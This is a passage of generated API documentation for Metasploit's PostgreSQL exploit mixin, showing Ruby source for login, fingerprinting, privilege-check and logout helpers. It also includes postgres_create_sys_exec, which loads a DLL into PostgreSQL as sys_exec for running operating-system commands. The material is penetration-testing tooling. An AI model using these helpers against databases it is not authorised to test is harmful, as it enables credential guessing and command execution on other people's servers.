<span class='kw'>if</span> <span class='id identifier rubyid_resp'>resp</span><span class='lbracket'>[</span><span class='symbol'>:sql_error</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_print_error'>print_error</span> <span class='id identifier rubyid_resp'>resp</span><span class='lbracket'>[</span><span class='symbol'>:sql_error</span><span class='rbracket'>]</span>
<span class='kw'>return</span> <span class='kw'>false</span>
<span class='kw'>end</span>
<span class='kw'>return</span> <span class='lbracket'>[</span><span class='id identifier rubyid_tbl'>tbl</span><span class='comma'>,</span><span class='id identifier rubyid_fld'>fld</span><span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="postgres_create_sys_exec-instance_method">
#<strong>postgres_create_sys_exec</strong>(dll) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<div class="note deprecated"><strong>Deprecated.</strong> <div class='inline'>
<p>Just get a real shell instead</p>
</div></div>
<p>Creates the function sys_exec() in the pg_temp schema.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
378
379
380
381
382
383
384
385
386</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 378</span>
<span class='kw'>def</span> <span class='id identifier rubyid_postgres_create_sys_exec'>postgres_create_sys_exec</span><span class='lparen'>(</span><span class='id identifier rubyid_dll'>dll</span><span class='rparen'>)</span>
<span class='id identifier rubyid_q'>q</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>create or replace function pg_temp.sys_exec(text) returns int4 as &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_dll'>dll</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;, &#39;sys_exec&#39; language c returns null on null input immutable</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_resp'>resp</span> <span class='op'>=</span> <span class='id identifier rubyid_postgres_query'>postgres_query</span><span class='lparen'>(</span><span class='id identifier rubyid_q'>q</span><span class='rparen'>)</span><span class='semicolon'>;</span>
<span class='kw'>if</span> <span class='id identifier rubyid_resp'>resp</span><span class='lbracket'>[</span><span class='symbol'>:sql_error</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_print_error'>print_error</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Error creating pg_temp.sys_exec: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_resp'>resp</span><span class='lbracket'>[</span><span class='symbol'>:sql_error</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>return</span> <span class='kw'>false</span>
<span class='kw'>end</span>
<span class='kw'>return</span> <span class='kw'>true</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="postgres_fingerprint-instance_method">
#<strong>postgres_fingerprint</strong>(args = {}) &#x21d2; <tt>Hash</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Attempts to fingerprint a remote PostgreSQL instance, inferring version number from the failed authentication messages or simply returning the result of “select version()” if authentication was successful.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>A hash containing the version in one of the keys :preauth, :auth, or :unknown, depending on how it was determined</p>
</div>
</li>
</ul>
<p class="tag_title">See Also:</p>
<ul class="see">
<li><span class='object_link'><a href="#postgres_authed_fingerprint-instance_method" title="Msf::Exploit::Remote::Postgres#postgres_authed_fingerprint (method)">#postgres_authed_fingerprint</a></span></li>
<li><span class='object_link'><a href="#analyze_auth_error-instance_method" title="Msf::Exploit::Remote::Postgres#analyze_auth_error (method)">#analyze_auth_error</a></span></li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 223</span>
<span class='kw'>def</span> <span class='id identifier rubyid_postgres_fingerprint'>postgres_fingerprint</span><span class='lparen'>(</span><span class='id identifier rubyid_args'>args</span><span class='op'>=</span><span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='id identifier rubyid_postgres_authed_fingerprint'>postgres_authed_fingerprint</span> <span class='kw'>if</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span>
<span class='id identifier rubyid_db'>db</span> <span class='op'>=</span> <span class='id identifier rubyid_args'>args</span><span class='lbracket'>[</span><span class='symbol'>:database</span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DATABASE</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_username'>username</span> <span class='op'>=</span> <span class='id identifier rubyid_args'>args</span><span class='lbracket'>[</span><span class='symbol'>:username</span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>USERNAME</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_password'>password</span> <span class='op'>=</span> <span class='id identifier rubyid_args'>args</span><span class='lbracket'>[</span><span class='symbol'>:password</span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PASSWORD</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_rhost'>rhost</span> <span class='op'>=</span> <span class='id identifier rubyid_args'>args</span><span class='lbracket'>[</span><span class='symbol'>:server</span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_rport'>rport</span> <span class='op'>=</span> <span class='id identifier rubyid_args'>args</span><span class='lbracket'>[</span><span class='symbol'>:port</span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_uri'><span class='object_link'><a href="../../../top-level-namespace.html#uri-instance_method" title="#uri (method)">uri</a></span></span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>tcp://</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_rhost'>rhost</span><span class='embexpr_end'>}</span><span class='tstring_content'>:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_rport'>rport</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>if</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Socket</span><span class='period'>.</span><span class='id identifier rubyid_is_ipv6?'>is_ipv6?</span><span class='lparen'>(</span><span class='id identifier rubyid_rhost'>rhost</span><span class='rparen'>)</span>
<span class='id identifier rubyid_uri'><span class='object_link'><a href="../../../top-level-namespace.html#uri-instance_method" title="#uri (method)">uri</a></span></span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>tcp://[</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_rhost'>rhost</span><span class='embexpr_end'>}</span><span class='tstring_content'>]:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_rport'>rport</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_verbose'>verbose</span> <span class='op'>=</span> <span class='id identifier rubyid_args'>args</span><span class='lbracket'>[</span><span class='symbol'>:verbose</span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>VERBOSE</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>begin</span>
<span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span> <span class='op'>=</span> <span class='const'>Connection</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='id identifier rubyid_db'>db</span><span class='comma'>,</span><span class='id identifier rubyid_username'>username</span><span class='comma'>,</span><span class='id identifier rubyid_password'>password</span><span class='comma'>,</span><span class='id identifier rubyid_uri'><span class='object_link'><a href="../../../top-level-namespace.html#uri-instance_method" title="#uri (method)">uri</a></span></span><span class='rparen'>)</span>
<span class='kw'>rescue</span> <span class='const'>RuntimeError</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_vprint_error'>vprint_error</span> <span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span>
<span class='id identifier rubyid_version_hash'>version_hash</span> <span class='op'>=</span> <span class='id identifier rubyid_analyze_auth_error'>analyze_auth_error</span> <span class='id identifier rubyid_e'>e</span>
<span class='kw'>return</span> <span class='id identifier rubyid_version_hash'>version_hash</span>
<span class='kw'>end</span>
<span class='kw'>return</span> <span class='id identifier rubyid_postgres_authed_fingerprint'>postgres_authed_fingerprint</span> <span class='kw'>if</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="postgres_has_database_privilege-instance_method">
#<strong>postgres_has_database_privilege</strong>(priv) &#x21d2; <tt>Boolean</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns Whether the current user has privilege <code>priv</code> on the current database.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Boolean</tt>)</span>
&mdash;
<div class='inline'>
<p>Whether the current user has privilege <code>priv</code> on the current database</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
366
367
368
369
370
371
372
373
374</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 366</span>
<span class='kw'>def</span> <span class='id identifier rubyid_postgres_has_database_privilege'>postgres_has_database_privilege</span><span class='lparen'>(</span><span class='id identifier rubyid_priv'>priv</span><span class='rparen'>)</span>
<span class='id identifier rubyid_sql'>sql</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>%Q{</span><span class='tstring_content'>select has_database_privilege(current_user,current_database(),&#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_priv'>priv</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;)</span><span class='tstring_end'>}</span></span>
<span class='id identifier rubyid_ret'>ret</span> <span class='op'>=</span> <span class='id identifier rubyid_postgres_query'>postgres_query</span><span class='lparen'>(</span><span class='id identifier rubyid_sql'>sql</span><span class='comma'>,</span><span class='kw'>false</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_ret'>ret</span><span class='period'>.</span><span class='id identifier rubyid_keys'>keys</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='symbol'>:complete</span>
<span class='id identifier rubyid_ret'>ret</span><span class='period'>.</span><span class='id identifier rubyid_values'>values</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_rows'>rows</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_inspect'>inspect</span> <span class='op'>=~</span> <span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>t</span><span class='regexp_end'>/i</span></span> <span class='op'>?</span> <span class='kw'>true</span> <span class='op'>:</span> <span class='kw'>false</span>
<span class='kw'>else</span>
<span class='kw'>return</span> <span class='kw'>false</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="postgres_login-instance_method">
#<strong>postgres_login</strong>(opts = {}) &#x21d2; <tt>:error_database</tt>, ...
</h3><div class="docstring">
<div class="discussion">
<div class="note notetag">
<strong>Note:</strong>
<div class='inline'>
<p>This method will first call <span class='object_link'><a href="#postgres_logout-instance_method" title="Msf::Exploit::Remote::Postgres#postgres_logout (method)">#postgres_logout</a></span> if the module is already connected.</p>
</div>
</div>
<p>Takes a number of arguments (defaults to the datastore for appropriate values), and will either populate <span class='object_link'><a href="#postgres_conn-instance_method" title="Msf::Exploit::Remote::Postgres#postgres_conn (method)">#postgres_conn</a></span> and return <code>:connected</code>, or will return <code>:error</code>, <code>:error_databse</code>, or <code>:error_credentials</code> in case of an error.</p>
<p>Fun fact: if you get <code>:error_database</code>, it means your username and password was accepted (you just failed to guess a correct running database instance).</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>opts</span>
<span class='type'>(<tt>Hash</tt>)</span>
<em class="default">(defaults to: <tt>{}</tt>)</em>
&mdash;
<div class='inline'>
<p>Options for authenticating</p>
</div>
</li>
</ul>
<p class="tag_title">Options Hash (<tt>opts</tt>):</p>
<ul class="option">
<li>
<span class="name">:database</span>
<span class="type">(<tt>String</tt>)</span>
<span class="default">
</span>
&mdash; <div class='inline'>
<p>The database</p>
</div>
</li>
<li>
<span class="name">:username</span>
<span class="type">(<tt>String</tt>)</span>
<span class="default">
</span>
&mdash; <div class='inline'>
<p>The username</p>
</div>
</li>
<li>
<span class="name">:username</span>
<span class="type">(<tt>String</tt>)</span>
<span class="default">
</span>
&mdash; <div class='inline'>
<p>The username</p>
</div>
</li>
<li>
<span class="name">:server</span>
<span class="type">(<tt>String</tt>)</span>
<span class="default">
</span>
&mdash; <div class='inline'>
<p>IP address or hostname of the target server</p>
</div>
</li>
<li>
<span class="name">:port</span>
<span class="type">(<tt>Integer</tt>)</span>
<span class="default">
</span>
&mdash; <div class='inline'>
<p>TCP port on :server</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>:error_database</tt>)</span>
&mdash;
<div class='inline'>
<p>if user/pass are correct but database is wrong</p>
</div>
</li>
<li>
<span class='type'>(<tt>:error_credentials</tt>)</span>
&mdash;
<div class='inline'>
<p>if user/pass are wrong</p>
</div>
</li>
<li>
<span class='type'>(<tt>:error</tt>)</span>
&mdash;
<div class='inline'>
<p>if some other error occurred</p>
</div>
</li>
<li>
<span class='type'>(<tt>:connected</tt>)</span>
&mdash;
<div class='inline'>
<p>if everything went as planned</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 92</span>
<span class='kw'>def</span> <span class='id identifier rubyid_postgres_login'>postgres_login</span><span class='lparen'>(</span><span class='id identifier rubyid_opts'>opts</span><span class='op'>=</span><span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_postgres_logout'>postgres_logout</span> <span class='kw'>if</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span>
<span class='id identifier rubyid_db'>db</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:database</span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DATABASE</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_username'>username</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:username</span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>USERNAME</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_password'>password</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:password</span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PASSWORD</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_ip'>ip</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:server</span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_port'>port</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:port</span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_proxies'>proxies</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:proxies</span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Proxies</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_uri'><span class='object_link'><a href="../../../top-level-namespace.html#uri-instance_method" title="#uri (method)">uri</a></span></span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>tcp://</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ip'>ip</span><span class='embexpr_end'>}</span><span class='tstring_content'>:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_port'>port</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>if</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Socket</span><span class='period'>.</span><span class='id identifier rubyid_is_ipv6?'>is_ipv6?</span><span class='lparen'>(</span><span class='id identifier rubyid_ip'>ip</span><span class='rparen'>)</span>
<span class='id identifier rubyid_uri'><span class='object_link'><a href="../../../top-level-namespace.html#uri-instance_method" title="#uri (method)">uri</a></span></span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>tcp://[</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ip'>ip</span><span class='embexpr_end'>}</span><span class='tstring_content'>]:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_port'>port</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_verbose'>verbose</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:verbose</span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>VERBOSE</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>begin</span>
<span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span> <span class='op'>=</span> <span class='const'>Connection</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='id identifier rubyid_db'>db</span><span class='comma'>,</span><span class='id identifier rubyid_username'>username</span><span class='comma'>,</span><span class='id identifier rubyid_password'>password</span><span class='comma'>,</span><span class='id identifier rubyid_uri'><span class='object_link'><a href="../../../top-level-namespace.html#uri-instance_method" title="#uri (method)">uri</a></span></span><span class='comma'>,</span><span class='id identifier rubyid_proxies'>proxies</span><span class='rparen'>)</span>
<span class='kw'>rescue</span> <span class='const'>RuntimeError</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='kw'>case</span> <span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\t</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='lbracket'>[</span><span class='int'>1</span><span class='rbracket'>]</span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>C3D000</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_print_status'>print_status</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ip'>ip</span><span class='embexpr_end'>}</span><span class='tstring_content'>:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_port'>port</span><span class='embexpr_end'>}</span><span class='tstring_content'> Postgres - Invalid database: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_db'>db</span><span class='embexpr_end'>}</span><span class='tstring_content'> (Credentials &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_password'>password</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39; are OK)</span><span class='tstring_end'>&quot;</span></span> <span class='kw'>if</span> <span class='id identifier rubyid_verbose'>verbose</span>
<span class='kw'>return</span> <span class='symbol'>:error_database</span> <span class='comment'># Note this means the user:pass is good!
</span> <span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>C28000</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>C28P01</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_print_error'>print_error</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ip'>ip</span><span class='embexpr_end'>}</span><span class='tstring_content'>:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_port'>port</span><span class='embexpr_end'>}</span><span class='tstring_content'> Postgres - Invalid username or password: &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;:&#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_password'>password</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span> <span class='kw'>if</span> <span class='id identifier rubyid_verbose'>verbose</span>
<span class='kw'>return</span> <span class='symbol'>:error_credentials</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_print_error'>print_error</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ip'>ip</span><span class='embexpr_end'>}</span><span class='tstring_content'>:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_port'>port</span><span class='embexpr_end'>}</span><span class='tstring_content'> Postgres - Error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_inspect'>inspect</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span> <span class='kw'>if</span> <span class='id identifier rubyid_verbose'>verbose</span>
<span class='kw'>return</span> <span class='symbol'>:error</span>
<span class='kw'>end</span>
<span class='kw'>rescue</span> <span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>ConnectionRefused</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_print_error'>print_error</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ip'>ip</span><span class='embexpr_end'>}</span><span class='tstring_content'>:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_port'>port</span><span class='embexpr_end'>}</span><span class='tstring_content'> Postgres - Connection Refused: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span> <span class='kw'>if</span> <span class='id identifier rubyid_verbose'>verbose</span>
<span class='kw'>return</span> <span class='symbol'>:connection_refused</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span>
<span class='id identifier rubyid_print_good'>print_good</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_content'>:</span><span class='embexpr_beg'>#{</span><span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span><span class='period'>.</span><span class='id identifier rubyid_peerport'>peerport</span><span class='embexpr_end'>}</span><span class='tstring_content'> Postgres - Logged in to &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_db'>db</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39; with &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;:&#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_password'>password</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span> <span class='kw'>if</span> <span class='id identifier rubyid_verbose'>verbose</span>
<span class='kw'>return</span> <span class='symbol'>:connected</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="postgres_logout-instance_method">
#<strong>postgres_logout</strong> &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Logs out of a database instance and sets <span class='object_link'><a href="#postgres_conn-instance_method" title="Msf::Exploit::Remote::Postgres#postgres_conn (method)">#postgres_conn</a></span> to nil</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
134
135
136
137
138
139
140
141
142
143
144</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/postgres.rb', line 134</span>
<span class='kw'>def</span> <span class='id identifier rubyid_postgres_logout'>postgres_logout</span>
<span class='id identifier rubyid_ip'>ip</span> <span class='op'>=</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span>
<span class='id identifier rubyid_port'>port</span> <span class='op'>=</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span><span class='period'>.</span><span class='id identifier rubyid_peerport'>peerport</span>
<span class='id identifier rubyid_verbose'>verbose</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>VERBOSE</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>if</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span>
<span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span><span class='period'>.</span><span class='id identifier rubyid_close'>close</span> <span class='kw'>if</span><span class='lparen'>(</span><span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span><span class='period'>.</span><span class='id identifier rubyid_kind_of?'>kind_of?</span><span class='lparen'>(</span><span class='const'>Connection</span><span class='rparen'>)</span> <span class='op'>&amp;&amp;</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_postgres_conn'>postgres_conn</span><span class='period'>.</span><span class='id identifier rubyid_instance_variable_get'>instance_variable_get</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>@conn</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='rparen'>)</span>
